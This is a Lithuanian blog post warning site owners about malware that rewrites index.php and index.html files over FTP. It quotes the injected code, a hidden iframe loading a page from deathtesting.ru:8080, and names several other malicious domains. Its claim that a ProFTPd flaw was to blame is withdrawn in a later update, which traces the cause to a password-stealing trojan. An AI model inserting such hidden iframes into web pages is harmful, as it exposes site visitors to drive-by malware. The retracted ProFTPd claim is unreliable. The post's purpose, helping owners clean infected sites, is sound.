Update: Want to read in english? See google translate.

Internete siaučia virusas, kuris laužia svetaines pasinaudodamas proFTPd serviso pažeidžiamumu, kuris ko gero atrastas visai naujai, nes kol kas, mano žiniomis, nėra atnaujinimų šiai klaidai spręsti. Ko gero vienintelis apsisaugojimo būdas yra FTP blokavimas arba leidimas jungtis tik iš žinomų IP adresų.

Įsibrovęs virusas pakeičia visus FTP index.php ir index.html failus ir prideda į juos tokį kodą:

<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”></div>
<div style=”display:none”>
<iframe width=339 height=853 src=”http://deathtesting.ru:8080/index.php” ></iframe>
</div>

deathtesting.ru gali būti kitoks, pvz: ofiget.ru, open-life.ru, offlife.ru ir kitokie.

Norint pašalinti šį nemalonų dalyką, reikia ištrinti nurodytas eilutes iš VISŲ index.html ir index.php failų esančių pasirinktame FTP.

Jeigu manote, kad Jūsų svetainė dar nepaleista ir ji nepažeidžiama taip pat klystate. Nulaužia net nežinomas svetaines. Priklauso nuo to, koks FTP servisas yra naudojamas.

UPDATE: O pasirodo proFTPd buvo apkaltintas visai nepelnytai. Pasirodo pasigavau trojana vagianti slaptazodzius. Avast’as kazkodel nesurado, pavyko tik Kasperskiui. Vis dar nepriprantu, kad Windows’uose reikia saugotis virusu ir kitokios bjaurasties, juk vis delto naudojau Linux’a kaip pagrindine OS kokius 6-7 metus is eiles. Svarstau, gal vel pereiti prie Linux + Virtualizuoti Windows. Dilema.